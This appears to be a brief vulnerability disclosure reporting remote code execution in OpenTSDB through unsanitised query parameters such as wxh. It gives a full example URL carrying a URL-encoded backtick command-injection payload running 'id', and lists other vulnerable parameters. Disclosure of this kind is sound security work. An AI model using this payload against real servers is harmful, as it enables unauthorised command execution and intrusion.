OpenTSDB suffers from a remote code execution vulnerability.
064abc9285703f1b7089680c28508d36
The paramenter wxh needs some sanitation before being used by opentsdb.
See example url:
http://opentsdb.com:4242/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60id%60&style=linespoint&png
Results in RCE unfortunately
More parameters:
wxh
start
m
o
key
style
Payload:
%60id%60
Affects all current versions of opentsdb.